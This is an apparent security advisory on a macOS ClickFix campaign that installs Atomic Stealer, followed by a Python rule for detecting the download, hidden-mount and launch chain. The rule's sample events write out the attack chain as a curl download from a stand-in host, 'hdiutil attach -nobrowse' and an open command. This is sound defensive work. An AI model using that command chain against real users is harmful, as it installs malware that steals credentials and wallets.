macOS ClickFix attack uses Terminal trick to silently install Atomic Stealer
Palo Alto Networks' Unit 42 found a new macOS campaign that uses the ClickFix trick, a fake CAPTCHA or "verification" page, to get users to paste a command into Terminal. The command quietly downloads a disk image, mounts it without showing a volume in Finder, locates the app inside the mounted volume, and launches it, installing the Atomic macOS Stealer (AMOS). The malware then shows a fake system password prompt and steals browser credentials and cookies from many Chromium- and Firefox-based browsers, cryptocurrency wallet data, Keychain contents, messaging app data, and documents. Because the whole chain runs from one pasted command, it is stealthier than older campaigns that relied on the victim manually opening a downloaded disk image and dragging or double-clicking the app.
- Check
- Warn Mac users never to paste website-supplied commands into Terminal to pass a CAPTCHA, and watch endpoints for unexpected `hdiutil attach` mounts (especially with `-nobrowse`, which hides the volume from Finder) of disk images in /tmp, and for curl or wget writing downloads into /tmp, particularly when both come from the same interactive shell within seconds.
- Affected
- macOS users tricked by fake CAPTCHA or verification pages into running a Terminal command; crypto-wallet holders and anyone with browser-stored credentials and Keychain secrets are the main targets.
- Fix
- Train users to recognize ClickFix lures, restrict or monitor Terminal use on managed Macs, deploy endpoint protection that detects AMOS behavior (the fake password prompt, bulk reads of browser profile and Keychain files), and keep cryptocurrency keys and other high-value secrets in hardware-backed protection rather than in browser extensions or files on disk.
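The detection guidance above can be turned into a concrete rule over process-execution telemetry. The following is an added example written for this page, not Unit 42's code or a published rule: it classifies each command line into one of the three stages of the chain (download into /tmp, hidden `hdiutil attach`, launch from a mounted volume) and raises an alert only when two or more distinct stages appear in the same shell session within a short window, so a developer mounting a DMG by hand does not trip it. The event format (`ProcEvent`, with a hypothetical `session` id for the spawning shell), the `.invalid` URLs and all sample lines are constructed for illustration.

```python
"""Added example: flag the curl -> hdiutil attach -nobrowse -> open chain in
process-execution logs. The event schema and sample events are constructed;
adapt classify() to your EDR's fields."""
import os
import shlex
from collections import defaultdict
from dataclasses import dataclass

# Both the symlink and the resolved form of the temp directories on macOS.
TMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/")


@dataclass(frozen=True)
class ProcEvent:
    ts: int        # epoch seconds
    user: str
    session: str   # hypothetical id of the interactive shell that spawned the process
    cmdline: str


def classify(ev: ProcEvent):
    """Return the chain stage this command line represents, or None."""
    try:
        argv = shlex.split(ev.cmdline)
    except ValueError:        # unbalanced quotes: not parseable, not a match
        return None
    if not argv:
        return None
    tool = os.path.basename(argv[0])
    if tool in ("curl", "wget"):
        # curl writes with -o/--output, wget with -O/--output-document.
        flags = ("-o", "--output") if tool == "curl" else ("-O", "--output-document")
        for i, tok in enumerate(argv):
            if tok in flags and i + 1 < len(argv) and argv[i + 1].startswith(TMP_PREFIXES):
                return "download_to_tmp"
    elif tool == "hdiutil" and "attach" in argv[1:]:
        hidden = "-nobrowse" in argv                         # no volume icon in Finder
        from_tmp = any(a.startswith(TMP_PREFIXES) for a in argv[1:])
        if hidden or from_tmp:
            return "hidden_mount"
    elif tool == "open" and any(a.startswith("/Volumes/") for a in argv[1:]):
        return "launch_from_volume"
    elif tool == "xattr" and "com.apple.quarantine" in argv and any(
        a.startswith("/Volumes/") for a in argv[1:]
    ):
        return "launch_from_volume"                          # quarantine flag stripped
    elif argv[0].startswith("/Volumes/"):
        return "launch_from_volume"                          # binary executed directly
    return None


def correlate(events, window=120):
    """Alert when a (user, session) shows two or more distinct stages within
    `window` seconds of the first hit; all three stages is rated high."""
    by_session = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        stage = classify(ev)
        if stage:
            by_session[(ev.user, ev.session)].append((ev.ts, stage))
    alerts = []
    for (user, session), hits in by_session.items():
        first_ts = hits[0][0]
        stages = {s for ts, s in hits if ts - first_ts <= window}
        if len(stages) >= 2:
            alerts.append({
                "user": user,
                "session": session,
                "stages": sorted(stages),
                "severity": "high" if len(stages) == 3 else "medium",
            })
    return alerts


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # ClickFix-style chain pasted into one shell.
    ProcEvent(1000, "alice", "zsh-4242",
              "curl -sL -o /tmp/verify.dmg https://captcha.example.invalid/verify.dmg"),
    ProcEvent(1001, "alice", "zsh-4242", "hdiutil attach -nobrowse -noverify /tmp/verify.dmg"),
    ProcEvent(1002, "alice", "zsh-4242", 'find /Volumes/Verify -maxdepth 1 -name "*.app"'),
    ProcEvent(1003, "alice", "zsh-4242", "open /Volumes/Verify/Verify.app"),
    # Benign developer activity: image in ~/Downloads, visible mount, one launch.
    ProcEvent(2000, "bob", "zsh-7777",
              "curl -sL -o /Users/bob/Downloads/tool.dmg https://dl.example.invalid/tool.dmg"),
    ProcEvent(2005, "bob", "zsh-7777", "hdiutil attach /Users/bob/Downloads/tool.dmg"),
    ProcEvent(2010, "bob", "zsh-7777", "open /Volumes/tool/tool.app"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The `find` step is deliberately not a stage: on its own it is too common to be a signal, and the chain is already identified by the download, the hidden mount and the launch. Bob's session produces a single `launch_from_volume` hit and no alert; Alice's produces all three stages within four seconds and is rated high.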